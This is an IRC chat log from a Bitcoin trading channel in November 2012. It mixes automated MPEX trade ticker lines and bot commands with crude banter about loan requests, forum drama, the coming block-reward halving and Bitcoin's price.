09:26:26 [MPEX] [S.MPOE] 3810 @ 0.00053561 = 2.0407 BTC [+] Nov 26 09:27:00 they want to borrow untraceable btc to repay phone bill in collections to be able to get money off the state that they will NEVER repay Nov 26 09:27:14 while "studying" some bs social pseudosciences ? Nov 26 09:27:58 yeah basically, but they asked nicely Nov 26 09:28:51 they need the "substance not form" doctrine extended to apply to this. Nov 26 09:29:05 send him to jale on obscenity charges. Nov 26 09:30:30 i wish there were more loan requests, i could browse these all day Nov 26 09:30:37 [MPEX] [S.MPOE] 2345 @ 0.0005279 = 1.2379 BTC [-] Nov 26 09:30:39 [MPEX] [S.MPOE] 13481 @ 0.00052764 = 7.1131 BTC [-] Nov 26 09:30:40 [MPEX] [S.MPOE] 1524 @ 0.00052708 = 0.8033 BTC [-] Nov 26 09:31:10 "Need 12 more bitcoins for medication 4 son' Nov 26 09:32:28 "Loan to Buy Girlfriend Perfect Supprise Birthday Present" Nov 26 09:33:57 ya well that's all for me. gnite. **** BEGIN LOGGING AT Mon Nov 26 16:30:36 2012 Nov 26 18:47:54 pigeons https://bitcointalk.org/index.php?topic=112447.msg1358331#msg1358331 Nov 26 18:47:56 this is going well. Nov 26 18:50:29 shocking! Nov 26 18:52:11 im really impressed with the "we won't spend 30 btc to get reg'd on mpex cause it's expensive" Nov 26 18:52:17 "we shall invest it in hiar instead" Nov 26 18:52:22 crowd Nov 26 18:53:07 http://english.pravda.ru/opinion/columnists/19-11-2012/122849-obama_soviet_mistake-0/ meanwhile in soviet russia... Nov 26 19:05:26 heh, btcjam scammers, who'd've thunk it Nov 26 19:11:25 apparently there's still people who have too much btc for their sense. Nov 26 19:11:33 someone has to service them. Nov 26 19:12:14 good morning gents Nov 26 19:14:37 o hi Nov 26 19:14:46 did the angry mob sue you yet ? Nov 26 19:14:59 good forenoon Nov 26 19:18:09 the angry mob has quitted down a bit Nov 26 19:18:17 i was trending on bitcoinx.com for a couple days though Nov 26 19:18:45 heh, i stopped looking at bitcoinx because of that Nov 26 19:18:49 you made it useless Nov 26 19:18:55 hopefully things will get better when i post the list and some faqs Nov 26 19:19:49 deprived seems to think i've changed the contract for some reason because of the way quentin wrote the claims letter Nov 26 19:20:08 lol trending shavers. Nov 26 19:20:52 Topic Score Nov 26 19:20:52 CGMINER GPU FPGA overc monit fanspd RPC stratum linux/windows/osx/mip/r-pi 2.9.5 59 Nov 26 19:20:52 [GLBSE] BFLS.RIG - BFL Hardware mining & Sales 27 Nov 26 19:20:57 i fail to see what sense this makes. Nov 26 19:24:02 gigavps : i think that argument revolves around the use of I. i guess many people figured you were doing the bonds personally Nov 26 19:24:15 rather than as a business. Nov 26 19:25:12 well, they will believe whatever they want to believe Nov 26 19:25:57 im sure there's plenty of that heaped on top hehe Nov 26 19:26:31 giga vps is my handle for a reason Nov 26 19:26:37 my personal handle is liferealized Nov 26 19:31:34 "Then we need a lawyer, ideally available to get paid when he recovers our stolen funds. Anyone can suggest one?" Nov 26 19:31:38 that part was really funny. Nov 26 19:31:51 bwhahaha Nov 26 19:31:54 oh man Nov 26 19:31:58 I think I almost pissed myself Nov 26 19:33:37 need to start on those kegels ? Nov 26 19:37:08 LOL Nov 26 19:37:19 i haven't heard about kegels in a while Nov 26 19:38:10 mircea_popescu: I thought that in guys made it worse not better Nov 26 19:38:33 hm... i have no idea honestly. Nov 26 19:40:29 better stop doing those kegels mircea_popescu Nov 26 19:40:46 bah Nov 26 19:40:51 next im gonna have to stop eating babies Nov 26 19:40:55 what's this world coming to. Nov 26 19:41:33 http://upload.wikimedia.org/wikipedia/commons/7/78/Kegel_exercises_diagram.png doesn't this look like the diagram of a pussy fart ? Nov 26 19:42:06 "Exercises are usually done to reduce urinary incontinence,[3] reduce urinary incontinence after childbirth,[4] and reduce premature ejaculatory occurrences in men,[5] as well as to increase the size and intensity of erections.[6]" <<< there you go Diablo-D3 Nov 26 19:42:12 the arrows are going in the wrong direction Nov 26 19:42:33 >size Nov 26 19:42:57 dude, if my erect dick gets any bigger, Im going to have to start having sex with female horses. Nov 26 19:45:12 hey, i don't judge. Nov 26 19:47:38 haha Nov 26 19:52:15 mod6 someone should make a "choicest bits of -ass and other sets" programme. Nov 26 19:52:52 when does the reward half happen? Nov 26 19:53:05 2 days Nov 26 19:53:18 ;;halfreward Nov 26 19:53:18 [11:55] Estimated time of bitcoin block reward halving: Wed Nov 28 12:23:00 2012 | Time remaining: 2 days, 2 hours, 30 minutes, and 0 seconds Nov 26 19:53:18 Estimated time of bitcoin block reward halving: Wed Nov 28 20:23:18 2012 UTC | Time remaining: 2 days, 2 hours, 30 minutes, and 0 seconds. Nov 26 19:53:36 nice Nov 26 20:00:00 mircea_popescu: oh like a bash.org for classic moments in -ass land? Nov 26 20:00:31 look at the /q namespace on namecoin for quotes Nov 26 20:01:08 http://explorer.dot-bit.org/n/74239 Nov 26 20:02:20 where is usagi? Nov 26 20:02:28 here and there Nov 26 20:02:37 mostly in lala land Nov 26 20:02:49 http://explorer.dot-bit.org/n/74241 Nov 26 20:02:56 he/she/whomever seems to like to jump on the drama bandwagon Nov 26 20:05:58 what is this /q namespace on namecoins a place to spend a little namecoin to permanently quote someone? Nov 26 20:06:08 seems so Nov 26 20:08:20 http://explorer.dot-bit.org/n/74240 Nov 26 20:10:44 lol Nov 26 20:16:03 woah Nov 26 20:16:13 that's shocking and funny\ Nov 26 20:23:13 {"info": "we can spin it as 'we are closing' and do the neatest, cleanest, best run shut-down ever..."} Nov 26 20:23:14 lol Nov 26 21:26:31 !ticker s.dice Nov 26 21:26:48 assbot? Nov 26 21:27:12 assbot is afk, apparently Nov 26 21:27:15 ;;later tell kakrobrekla I think we lost assbot Nov 26 21:27:16 The operation succeeded. Nov 26 21:27:45 http://live.coinbr.com/?mpsic=S.MPOE Nov 26 21:27:51 check that out! it's like... diffusion ? Nov 26 21:29:45 So, on wikipedia, the statement about some people thinking that bitcoin is a ponzi with lame ass sources, seems to need to be countered wit a powerful statement sourcing the SEC, the ECB, a law professor discussing bitcoin, and a law professor discussing a digital currency based on Austrian school economics Nov 26 21:30:22 woah, that does look like diffusion Nov 26 21:30:45 it is certainly two divergent trends Nov 26 21:31:05 its actually exciting to watch this! Nov 26 21:31:10 i wonder what's next. Nov 26 21:31:53 one wide will win out, there are more bids than asks overall, but the asks 'pile up' much steaper Nov 26 21:32:07 DeaDTerra: irc is better :P Nov 26 21:32:10 ;;halfreward Nov 26 21:32:11 Estimated time of bitcoin block reward halving: Wed Nov 28 20:32:11 2012 UTC | Time remaining: 2 days, 1 hour, and 0 seconds. Nov 26 21:32:52 i'm even more curious where btc ends on month close. Nov 26 21:33:37 every few months there's one of these that might make or break a few fortunes Nov 26 21:33:41 well, how likely are people to freak out? taking the question in general... I'd say that we're doomed Nov 26 21:34:02 i frankly can see anything between 10 and 20 Nov 26 21:35:11 clearly we should take icbit's futures marked as an acceptable prediction of the price after the reward halving Nov 26 21:35:21 it says 12.25 Nov 26 21:46:56 lolk Nov 26 21:59:59 is it safe to click his link, might be a scam Nov 26 22:00:31 which link ? Nov 26 22:00:40 the DeaDTerra one Nov 26 22:01:54 "Apparently usagi's now selling off FPGAs bought using BMF funds on behalf of BMF shareholders and using the proceeds to repay the "liquidity loans" he took out for CPA, presumably because he offered to make himself personally liable for those loans" Nov 26 22:02:00 this is like the drama goose Nov 26 22:05:35 back Nov 26 22:05:36 ops Nov 26 22:06:00 link me to drama. Nov 26 22:09:08 assbot is dead Nov 26 22:09:18 oh Nov 26 22:09:26 havent noticed Nov 26 22:09:38 https://bitcointalk.org/index.php?topic=113708.msg1358922#msg1358922 drama Nov 26 22:10:57 dunno why it dies here and there, has to do something with ssl Nov 26 22:17:19 [MPEX] [S.MPOE] 27900 @ 0.00053197 = 14.842 BTC [-] Nov 26 22:22:08 [MPEX] [S.MPOE] 2300 @ 0.00053197 = 1.2235 BTC [-] Nov 26 22:30:32 [MPEX] [S.MPOE] 15000 @ 0.00053853 = 8.078 BTC [+] Nov 26 22:34:54 [MPEX] [S.MPOE] 28513 @ 0.00053853 = 15.3551 BTC [+] Nov 26 22:34:55 [MPEX] [S.MPOE] 1000 @ 0.00053859 = 0.5386 BTC [+] Nov 26 22:34:56 [MPEX] [S.MPOE] 3472 @ 0.0005386 = 1.87 BTC [+] Nov 26 22:39:35 https://bitcointalk.org/index.php?topic=126616.msg1358837#msg1358837 Nov 26 22:41:15 [MPEX] [S.MPOE] 17900 @ 0.0005386 = 9.6409 BTC [+] Nov 26 22:41:24 lol Nov 26 22:44:40 that guys mom needs to take away his computer Nov 26 22:45:38 [MPEX] [S.MPOE] 6400 @ 0.00053597 = 3.4302 BTC [-] Nov 26 22:45:39 all the everyday losers are too soon. Nov 26 22:47:17 [MPEX] [S.MPOE] 3000 @ 0.00052898 = 1.5869 BTC [-] Nov 26 22:47:19 [MPEX] [S.MPOE] 5500 @ 0.00052824 = 2.9053 BTC [-] Nov 26 22:51:42 [MPEX] [S.MPOE] 17750 @ 0.00053525 = 9.5007 BTC [+] Nov 26 22:51:42 lmao Nov 26 22:51:43 [MPEX] [S.MPOE] 13450 @ 0.0005386 = 7.2442 BTC [+] Nov 26 22:51:54 nov 25th, i write on the problem of too much money Nov 26 22:52:02 nov the 26th, graham does too. Nov 26 22:52:08 thought leader i. Nov 26 22:52:29 graham? Nov 26 22:52:41 http://ycombinator.com/ycvc.html Nov 26 22:54:11 [MPEX] [S.MPOE] 6700 @ 0.00052824 = 3.5392 BTC [-] Nov 26 22:59:03 https://www.privateinternetaccess.com/blog/2012/11/even-a-vpn-service-cant-protect-your-privacy-if-youre-using-bank-of-america/ Nov 26 22:59:04 lol Nov 26 23:01:41 [MPEX] [S.MPOE] 9650 @ 0.00053173 = 5.1312 BTC [+] Nov 26 23:01:43 [MPEX] [S.MPOE] 500 @ 0.00052824 = 0.2641 BTC [-] Nov 26 23:03:35 [MPEX] [S.DICE] 3050 @ 0.00336849 = 10.2739 BTC [-] Nov 26 23:06:23 [MPEX] [S.MPOE] 11250 @ 0.00052824 = 5.9427 BTC [-] Nov 26 23:06:57 http://blog.smickles.com/bitcoin/proposal-for-rewording-the-ponzi-accusation-statement/ Nov 26 23:07:11 More wiki 'debate' pr0n Nov 26 23:08:03 [MPEX] [S.MPOE] 2150 @ 0.00052824 = 1.1357 BTC [-] Nov 26 23:08:05 [MPEX] [S.MPOE] 10450 @ 0.00052679 = 5.505 BTC [-] Nov 26 23:15:04 [MPEX] [S.MPOE] 8500 @ 0.00052881 = 4.4949 BTC [+] Nov 26 23:30:45 [MPEX] [S.MPOE] 6500 @ 0.00053133 = 3.4536 BTC [+] Nov 26 23:34:12 [MPEX] [S.MPOE] 4000 @ 0.00052881 = 2.1152 BTC [-] Nov 26 23:34:58 [MPEX] [S.MPOE] 22600 @ 0.00053133 = 12.0081 BTC [+] Nov 26 23:40:59 interesting, http://www.forbes.com/sites/jonmatonis/2012/11/26/payments-startup-balanced-innovates-in-wrong-direction/ leading to https://github.com/balanced/balanced-api/issues/204 Nov 26 23:41:29 aw Nov 26 23:46:11 [MPEX] [S.MPOE] 4100 @ 0.00052887 = 2.1684 BTC [-] Nov 26 23:46:12 [MPEX] [S.MPOE] 2441 @ 0.00053133 = 1.297 BTC [+] Nov 26 23:55:54 [MPEX] [S.MPOE] 8550 @ 0.00052881 = 4.5213 BTC [-] Nov 26 23:55:56 [MPEX] [S.MPOE] 15250 @ 0.00052679 = 8.0335 BTC [-] Nov 26 23:55:57 [MPEX] [S.MPOE] 3000 @ 0.00052665 = 1.58 BTC [-] Nov 26 23:55:58 [MPEX] [S.MPOE] 1800 @ 0.00052548 = 0.9459 BTC [-] Nov 26 23:56:18 anyone notice http://tools.ietf.org/html/draft-stanish-x-iso4217-a3-00#section-2.3 and http://www.ifex-project.org/our-proposals/x-iso4217-a3? Nov 27 00:00:21 [MPEX] [S.MPOE] 3450 @ 0.00052548 = 1.8129 BTC [-] Nov 27 00:03:53 i knew about it Nov 27 00:03:58 they'll just have to change their codes. Nov 27 00:04:15 [MPEX] [S.MPOE] 259 @ 0.00053133 = 0.1376 BTC [+] Nov 27 00:04:27 nowait. Nov 27 00:04:29 this is new Nov 27 00:04:36 wtf ? buttcoins made it to ietf ?! Nov 27 00:08:07 anyone can write a draft Nov 27 00:08:10 [MPEX] [S.MPOE] 20700 @ 0.00053266 = 11.0261 BTC [+] Nov 27 00:08:16 yeah someone from microsoft submitted it Nov 27 00:08:45 pretty cool in any event Nov 27 00:08:59 surprised AAPL hasnt filed patent for 'coins made out of bits' Nov 27 00:09:02 it's squarely in the bikeshed territory, the xbtc reference Nov 27 00:09:06 so pretty unlikely to be touched Nov 27 00:09:14 dub im sure it has. Nov 27 00:14:11 http://shrani.si/f/13/eL/3A2bL8mS/better.png Nov 27 00:14:18 i know i know, just trollin Nov 27 00:18:11 lol Nov 27 00:20:28 they need the cherry truck award Nov 27 00:21:38 [MPEX] [S.MPOE] 10700 @ 0.00053416 = 5.7155 BTC [+] Nov 27 00:21:54 meh Nov 27 00:21:55 nah, it was some noncompliant browser Nov 27 00:21:59 whens the reward halving? Nov 27 00:22:05 nao Nov 27 00:22:07 ;;halfreward Nov 27 00:22:07 Estimated time of bitcoin block reward halving: Wed Nov 28 20:12:08 2012 UTC | Time remaining: 1 day, 21 hours, 50 minutes, and 0 seconds. Nov 27 00:22:19 oh hay Nov 27 00:22:20 its moved back Nov 27 00:22:28 ;;asicshipped Nov 27 00:22:29 Error: "asicshipped" is not a valid command. Nov 27 00:22:33 lawls Nov 27 00:22:38 also Nov 27 00:22:43 browser is ok, site is not valid Nov 27 00:22:56 i know i know, just trollin Nov 27 00:23:03 ;) Nov 27 00:23:10 I wonder if Ill get a block before then Nov 27 00:24:31 lawls Nov 27 00:24:41 Ukto: Im asyc, bitch! Nov 27 00:25:01 douchebag keyboard, dropping letters Nov 27 00:25:40 hah, See: user error Nov 27 00:25:41 :P Nov 27 00:25:49 no seriously Nov 27 00:26:03 sometimes I have to replug it because it wont repeat and half the keyboard is dead Nov 27 00:26:10 the microcontroller is nuts Nov 27 00:27:00 ;;ticker Nov 27 00:27:01 BTCUSD ticker | Best bid: 12.30408, Best ask: 12.31269, Bid-ask spread: 0.00861, Last trade: 12.10701, 24 hour volume: 34526.91363606, 24 hour low: 11.89000, 24 hour high: 12.65150, 24 hour vwap: 12.37671 Nov 27 00:28:08 wewt Nov 27 00:28:16 yeah thats not so bad Nov 27 00:31:17 [MPEX] [S.MPOE] 23400 @ 0.00053416 = 12.4993 BTC [+] Nov 27 00:31:18 [MPEX] [S.MPOE] 200 @ 0.00053434 = 0.1069 BTC [+] Nov 27 00:32:15 [MPEX] [S.MPOE] 2345 @ 0.00053288 = 1.2496 BTC [-] Nov 27 00:32:15 [MPEX] [S.MPOE] 1491 @ 0.00053266 = 0.7942 BTC [-] Nov 27 00:32:17 [MPEX] [S.MPOE] 350 @ 0.00052548 = 0.1839 BTC [-] Nov 27 00:32:18 [MPEX] [S.MPOE] 6376 @ 0.00052508 = 3.3479 BTC [-] Nov 27 00:32:19 [MPEX] [S.MPOE] 7850 @ 0.00052502 = 4.1214 BTC [-] Nov 27 00:32:20 [MPEX] [S.MPOE] 3492 @ 0.00052358 = 1.8283 BTC [-] Nov 27 00:34:57 i wonder if blockblocking will follow cockblocking in the vernacular. Nov 27 00:35:27 wat is blockblocking Nov 27 00:35:49 "mining" Nov 27 00:35:51 when someone impedes someone else from solving a block theyweren't going to solve anyway. Nov 27 00:36:52 how would that be done, like, technically? Nov 27 00:37:05 it's not technically, it's imaginatively. Nov 27 00:37:14 mircea_popescu: "are you going to eat that pussy? I mean, its just sitting there on the plate, you've barely touched it" Nov 27 00:38:11 lol Nov 27 00:41:01 [MPEX] [S.MPOE] 2345 @ 0.00052374 = 1.2282 BTC [+] Nov 27 00:41:03 [MPEX] [S.MPOE] 7602 @ 0.00052358 = 3.9803 BTC [-] Nov 27 00:41:04 [MPEX] [S.MPOE] 2649 @ 0.00052019 = 1.378 BTC [-] Nov 27 00:41:05 [MPEX] [S.MPOE] 4404 @ 0.00052018 = 2.2909 BTC [-] Nov 27 00:47:58 [MPEX] [S.MPOE] 13946 @ 0.00052018 = 7.2544 BTC [-] Nov 27 00:48:00 [MPEX] [S.MPOE] 4204 @ 0.0005198 = 2.1852 BTC [-] Nov 27 00:49:27 [MPEX] [S.MPOE] 2345 @ 0.00053421 = 1.2527 BTC [+] Nov 27 00:49:29 [MPEX] [S.MPOE] 15750 @ 0.00053434 = 8.4159 BTC [+] Nov 27 00:49:30 [MPEX] [S.MPOE] 555 @ 0.00053458 = 0.2967 BTC [+] Nov 27 00:56:12 [MPEX] [S.MPOE] 2345 @ 0.00053036 = 1.2437 BTC [-] Nov 27 00:56:13 [MPEX] [S.MPOE] 5813 @ 0.0005302 = 3.0821 BTC [-] Nov 27 00:58:50 [MPEX] [S.MPOE] 13200 @ 0.00051989 = 6.8625 BTC [-] Nov 27 01:02:45 ;;rewardhalf Nov 27 01:02:45 Error: "rewardhalf" is not a valid command. Nov 27 01:02:53 ;;halfreward Nov 27 01:02:53 Estimated time of bitcoin block reward halving: Wed Nov 28 19:52:54 2012 UTC | Time remaining: 1 day, 20 hours, 50 minutes, and 0 seconds. Nov 27 01:06:19 [MPEX] [S.MPOE] 25346 @ 0.0005198 = 13.1749 BTC [-] Nov 27 01:06:21 [MPEX] [S.MPOE] 10254 @ 0.00051955 = 5.3275 BTC [-] Nov 27 01:11:28 [MPEX] [S.MPOE] 11642 @ 0.00051989 = 6.0526 BTC [+] Nov 27 01:16:24 [MPEX] [S.MPOE] 15608 @ 0.00052699 = 8.2253 BTC [+] Nov 27 01:17:40 [MPEX] [S.MPOE] 19300 @ 0.00051979 = 10.0319 BTC [-] Nov 27 01:17:41 [MPEX] [S.MPOE] 6800 @ 0.00051955 = 3.5329 BTC [-] Nov 27 01:18:28 hallo. we has hack today for you Nov 27 01:18:56 another linode hack ? 0,o Nov 27 01:19:34 no just shit connectivity Nov 27 01:20:01 http://trilema.com/2012/the-frugally-adviseful/ Nov 27 01:20:27 [MPEX] [S.MPOE] 5821 @ 0.00051955 = 3.0243 BTC [-] Nov 27 01:23:11 [MPEX] [S.MPOE] 14370 @ 0.00051955 = 7.4659 BTC [-] Nov 27 01:23:12 [MPEX] [S.MPOE] 11000 @ 0.00051953 = 5.7148 BTC [-] Nov 27 01:23:14 [MPEX] [S.MPOE] 7100 @ 0.00051912 = 3.6858 BTC [-] Nov 27 01:23:15 [MPEX] [S.MPOE] 17800 @ 0.00051888 = 9.2361 BTC [-] Nov 27 01:23:16 [MPEX] [S.MPOE] 8350 @ 0.00051873 = 4.3314 BTC [-] Nov 27 01:23:17 [MPEX] [S.MPOE] 7798 @ 0.00051861 = 4.0441 BTC [-] Nov 27 01:25:24 the fuck is nasal? Nov 27 01:26:01 weird huh Nov 27 01:26:04 a brand of aged cheese Nov 27 01:26:07 quite good actually. Nov 27 01:26:15 [MPEX] [S.MPOE] 13400 @ 0.00051861 = 6.9494 BTC [-] Nov 27 01:26:17 figured Nov 27 01:26:32 google translate failed me Nov 27 01:26:44 you figured it's cheese ? Nov 27 01:27:34 updated to about 1.4% http://blog.smickles.com/bitcoin/bitcoin-finance/a-good-month-for-s-dice-shareholders-in-the-making/#update_26nov12 Nov 27 01:27:57 it sure swings dunnit. Nov 27 01:30:14 mircea_popescu: yea Nov 27 01:30:32 smelly cheese was first guess Nov 27 01:30:42 wd. Nov 27 01:30:57 tho it's named for a place Nov 27 01:31:00 like champagne or cognac. Nov 27 01:36:01 [MPEX] [S.MPOE] 3902 @ 0.00051861 = 2.0236 BTC [-] Nov 27 01:36:03 [MPEX] [S.MPOE] 2991 @ 0.00051854 = 1.551 BTC [-] Nov 27 01:36:04 [MPEX] [S.MPOE] 11807 @ 0.00051847 = 6.1216 BTC [-] Nov 27 01:38:31 ;;ticker Nov 27 01:38:31 BTCUSD ticker | Best bid: 12.19998, Best ask: 12.19999, Bid-ask spread: 0.00001, Last trade: 12.19999, 24 hour volume: 35150.08809202, 24 hour low: 11.89000, 24 hour high: 12.65150, 24 hour vwap: 12.36118 Nov 27 01:38:36 o hey. back under 12 ? Nov 27 01:38:44 [MPEX] [S.MPOE] 2443 @ 0.00051847 = 1.2666 BTC [-] Nov 27 01:38:45 [MPEX] [S.MPOE] 10600 @ 0.0005182 = 5.4929 BTC [-] Nov 27 01:38:47 [MPEX] [S.MPOE] 31150 @ 0.00051812 = 16.1394 BTC [-] Nov 27 01:38:48 [MPEX] [S.MPOE] 12850 @ 0.00051807 = 6.6572 BTC [-] Nov 27 01:38:49 [MPEX] [S.MPOE] 8607 @ 0.00051788 = 4.4574 BTC [-] Nov 27 01:45:49 [MPEX] [S.MPOE] 7870 @ 0.0005224 = 4.1113 BTC [+] Nov 27 01:47:22 so the interestingness begins Nov 27 01:47:44 [MPEX] [S.MPOE] 8100 @ 0.00053058 = 4.2977 BTC [+] Nov 27 01:55:41 [MPEX] [S.MPOE] 25000 @ 0.00053131 = 13.2828 BTC [+] Nov 27 01:57:44 Someone sold around 10000 Nov 27 01:58:14 10500 around Nov 27 01:58:39 I need 10500 bitcoins to sell, you would most likely not see me online again. Nov 27 02:03:28 [MPEX] [S.MPOE] 4200 @ 0.00053131 = 2.2315 BTC [+] Nov 27 02:03:30 [MPEX] [S.MPOE] 5582 @ 0.00053058 = 2.9617 BTC [-] Nov 27 02:03:30 [MPEX] [S.MPOE] 16668 @ 0.00053049 = 8.8422 BTC [-] Nov 27 02:04:52 [MPEX] [S.MPOE] 3032 @ 0.00053049 = 1.6084 BTC [-] Nov 27 02:07:46 [MPEX] [S.MPOE] 13500 @ 0.00052686 = 7.1126 BTC [-] Nov 27 02:07:48 [MPEX] [S.MPOE] 14900 @ 0.00052527 = 7.8265 BTC [-] Nov 27 02:08:47 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.51492215 = 514.9222 BTC [-] Nov 27 02:22:49 [MPEX] [S.DICE] 200 @ 0.00336849 = 0.6737 BTC [-] Nov 27 02:22:50 [MPEX] [S.DICE] 2150 @ 0.00339999 = 7.31 BTC [+] Nov 27 02:24:52 [MPEX] [S.MPOE] 3248 @ 0.00052527 = 1.7061 BTC [-] Nov 27 02:24:53 [MPEX] [S.MPOE] 702 @ 0.00052461 = 0.3683 BTC [-] Nov 27 02:27:21 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.51492215 = 514.9222 BTC [-] Nov 27 02:30:57 [MPEX] [S.MPOE] 2798 @ 0.00052461 = 1.4679 BTC [-] Nov 27 02:30:59 [MPEX] [S.MPOE] 20600 @ 0.00052037 = 10.7196 BTC [-] Nov 27 02:35:21 [MPEX] [S.MPOE] 4593 @ 0.00051788 = 2.3786 BTC [-] Nov 27 02:35:22 [MPEX] [S.MPOE] 10337 @ 0.00051787 = 5.3532 BTC [-] Nov 27 02:35:24 [MPEX] [S.MPOE] 13837 @ 0.00051778 = 7.1645 BTC [-] Nov 27 02:40:47 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.51492215 = 514.9222 BTC [-] Nov 27 02:46:53 [MPEX] [S.MPOE] 5302 @ 0.00051811 = 2.747 BTC [+] Nov 27 02:47:15 https://i.chzbgr.com/completestore/12/11/19/AsbI5XyjNUS-_liBKjWLUw2.jpg Nov 27 02:47:32 oh gawd, chzbgr? Nov 27 02:47:48 dunno Nov 27 02:47:52 i just repasted. Nov 27 02:48:09 heh, good link tho, very entertaining Nov 27 02:48:24 seems kinda appropriate for the chan. Nov 27 02:49:48 but props Nov 27 02:49:57 i dont know any of their letters Nov 27 02:50:35 naw, you'd be cool, considring it's a numbers quiz Nov 27 02:50:48 not enough tentacle rape Nov 27 02:51:14 hmm, Nov 27 02:51:43 i can only count to 3 :o Nov 27 02:51:48 it starts at 4 :( Nov 27 02:57:03 chi Nov 27 03:04:20 ajajaj Nov 27 03:05:11 [MPEX] [S.MPOE] 3048 @ 0.00052322 = 1.5948 BTC [+] Nov 27 03:05:12 [MPEX] [S.MPOE] 7313 @ 0.00051778 = 3.7865 BTC [-] Nov 27 03:05:14 [MPEX] [S.MPOE] 26639 @ 0.00051777 = 13.7929 BTC [-] Nov 27 03:07:04 gnite all. **** BEGIN LOGGING AT Tue Nov 27 07:18:13 2012 Nov 27 07:26:22 [MPEX] [S.MPOE] 2345 @ 0.00051829 = 1.2154 BTC [+] Nov 27 07:26:23 [MPEX] [S.MPOE] 15358 @ 0.00051855 = 7.9639 BTC [+] Nov 27 07:29:41 [MPEX] [S.MPOE] 21000 @ 0.00051855 = 10.8896 BTC [+] Nov 27 07:31:55 [MPEX] [S.MPOE] 16600 @ 0.00051855 = 8.6079 BTC [+] Nov 27 07:38:48 [MPEX] [S.MPOE] 2345 @ 0.00051592 = 1.2098 BTC [-] Nov 27 07:38:50 [MPEX] [S.MPOE] 25102 @ 0.00051586 = 12.9491 BTC [-] Nov 27 07:41:02 [MPEX] [S.MPOE] 2345 @ 0.00051835 = 1.2155 BTC [+] Nov 27 07:41:04 [MPEX] [S.MPOE] 10392 @ 0.00051855 = 5.3888 BTC [+] Nov 27 07:41:05 [MPEX] [S.MPOE] 3063 @ 0.00052181 = 1.5983 BTC [+] Nov 27 07:49:18 [MPEX] [S.MPOE] 2345 @ 0.00051591 = 1.2098 BTC [-] Nov 27 07:49:19 [MPEX] [S.MPOE] 4598 @ 0.00051586 = 2.3719 BTC [-] Nov 27 07:49:21 [MPEX] [S.MPOE] 3683 @ 0.00051404 = 1.8932 BTC [-] Nov 27 07:49:22 [MPEX] [S.MPOE] 7474 @ 0.00051394 = 3.8412 BTC [-] Nov 27 07:52:55 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.42938889 = 429.3889 BTC [-] Nov 27 07:53:19 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.34744445 = 347.4445 BTC [-] Nov 27 07:57:03 [MPEX] [S.MPOE] 6026 @ 0.00051394 = 3.097 BTC [-] Nov 27 07:57:04 [MPEX] [S.MPOE] 1774 @ 0.00051386 = 0.9116 BTC [-] Nov 27 08:12:31 [MPEX] [S.DICE] 200 @ 0.00339856 = 0.6797 BTC [-] Nov 27 08:12:32 [MPEX] [S.DICE] 1400 @ 0.00334557 = 4.6838 BTC [-] Nov 27 08:14:44 http://www.intrade.com/news/id/782 soooo intrade is shuttering. Nov 27 08:15:29 [MPEX] [S.MPOE] 2345 @ 0.00051832 = 1.2155 BTC [+] Nov 27 08:15:30 [MPEX] [S.MPOE] 6200 @ 0.00051851 = 3.2148 BTC [+] Nov 27 08:15:31 [MPEX] [S.MPOE] 374 @ 0.00052054 = 0.1947 BTC [+] Nov 27 08:20:36 [MPEX] [S.MPOE] 3976 @ 0.00052054 = 2.0697 BTC [+] Nov 27 08:20:38 [MPEX] [S.MPOE] 4249 @ 0.00052181 = 2.2172 BTC [+] Nov 27 08:22:45 [MPEX] [S.MPOE] 15629 @ 0.0005199 = 8.1255 BTC [-] Nov 27 08:22:47 [MPEX] [S.MPOE] 11521 @ 0.00051386 = 5.9202 BTC [-] Nov 27 08:23:42 [MPEX] [S.MPOE] 2345 @ 0.00051408 = 1.2055 BTC [+] Nov 27 08:23:43 [MPEX] [S.MPOE] 9454 @ 0.00051386 = 4.858 BTC [-] Nov 27 08:28:16 [MPEX] [S.MPOE] 5251 @ 0.00051386 = 2.6983 BTC [-] Nov 27 08:28:17 [MPEX] [S.MPOE] 3949 @ 0.00051379 = 2.029 BTC [-] Nov 27 08:45:02 [MPEX] [S.MPOE] 2345 @ 0.0005215 = 1.2229 BTC [+] Nov 27 08:45:04 [MPEX] [S.MPOE] 3059 @ 0.00052181 = 1.5962 BTC [+] Nov 27 08:55:02 [MPEX] [S.MPOE] 1174 @ 0.00052181 = 0.6126 BTC [+] Nov 27 08:55:03 [MPEX] [S.MPOE] 16800 @ 0.00052203 = 8.7701 BTC [+] Nov 27 08:55:04 [MPEX] [S.MPOE] 10726 @ 0.00052351 = 5.6152 BTC [+] Nov 27 08:56:21 [MPEX] [S.MPOE] 13550 @ 0.00052351 = 7.0936 BTC [+] Nov 27 09:08:06 [MPEX] [S.MPOE] 11950 @ 0.00052126 = 6.2291 BTC [-] Nov 27 09:12:11 [MPEX] [S.DICE] 1005 @ 0.00334557 = 3.3623 BTC [-] Nov 27 09:25:35 [MPEX] [S.MPOE] 2345 @ 0.00051983 = 1.219 BTC [-] Nov 27 09:25:37 [MPEX] [S.MPOE] 10055 @ 0.00051948 = 5.2234 BTC [-] Nov 27 09:30:02 [MPEX] [S.MPOE] 1745 @ 0.00051948 = 0.9065 BTC [-] Nov 27 09:30:04 [MPEX] [S.MPOE] 21055 @ 0.00051379 = 10.8178 BTC [-] Nov 27 09:34:10 [MPEX] [S.MPOE] 2345 @ 0.00052114 = 1.2221 BTC [+] Nov 27 09:34:11 [MPEX] [S.MPOE] 4605 @ 0.00052126 = 2.4004 BTC [+] Nov 27 09:36:37 [MPEX] [S.MPOE] 5272 @ 0.00052126 = 2.7481 BTC [+] Nov 27 09:38:54 [MPEX] [S.DICE] 1350 @ 0.00334522 = 4.516 BTC [-] Nov 27 09:39:33 [MPEX] [S.MPOE] 2345 @ 0.00051387 = 1.205 BTC [-] Nov 27 09:39:34 [MPEX] [S.MPOE] 8246 @ 0.00051379 = 4.2367 BTC [-] Nov 27 09:39:35 [MPEX] [S.MPOE] 8159 @ 0.00051355 = 4.1901 BTC [-] Nov 27 09:57:13 [MPEX] [S.MPOE] 13650 @ 0.00051972 = 7.0942 BTC [+] Nov 27 09:58:42 [MPEX] [S.MPOE] 2550 @ 0.00051429 = 1.3114 BTC [-] Nov 27 10:06:13 [MPEX] [S.MPOE] 5350 @ 0.00051921 = 2.7778 BTC [+] Nov 27 10:16:20 [MPEX] 